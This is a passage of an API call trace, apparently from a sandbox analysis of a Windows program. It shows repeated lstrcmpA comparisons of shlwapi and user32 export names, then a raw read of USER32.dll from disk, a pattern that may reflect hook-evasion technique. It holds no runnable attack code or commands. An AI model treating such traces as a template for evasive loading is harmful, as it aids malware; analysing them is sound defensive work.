[0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0104.128] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0104.128] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0104.129] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0104.129] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0104.130] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0104.130] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0104.131] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0104.131] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0104.131] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0104.131] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0104.131] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0104.131] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0104.150] GetProcessHeap () returned 0x5b0000 [0104.150] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d25030 | out: hHeap=0x5b0000) returned 1 [0104.150] GetProcessHeap () returned 0x5b0000 [0104.150] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c9100 [0104.150] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0104.150] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0104.150] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0104.150] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0104.150] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0104.151] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0104.151] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0104.151] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0104.151] GetProcessHeap () returned 0x5b0000 [0104.151] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1555b8) returned 0x40e4040 [0104.155] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0104.155] ReadFile (in: hFile=0x17c, lpBuffer=0x40e4040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40e4040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0104.391] CloseHandle (hObject=0x17c) returned 1 [0104.392] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0104.392] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0104.392] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0104.392] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0104.392] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0104.392] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0104.392] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0104.392] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0104.392] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0104.392] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0104.392] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0104.392] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0104.392] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0104.392] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0104.392] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0104.393] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0104.393] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0104.393] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0104.393] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0104.393] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0104.393] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0104.393] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0104.393] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0104.393] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0104.393] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0104.393] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0104.393] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0104.393] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0104.393] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0104.394] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0104.394] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0104.394] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0104.394] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0104.394] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0104.394] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0104.394] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0104.394] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0104.394] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0104.395] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0104.395] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0104.396] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0104.396] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0104.397] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0104.397] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0104.398] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0104.398] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0104.398] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0104.398] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0104.398] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0104.398] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0104.398] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0104.398] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0104.398] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0104.398] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0104.398] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0104.399] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0104.399] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0104.400] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0104.400] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0104.400] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0104.401] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", 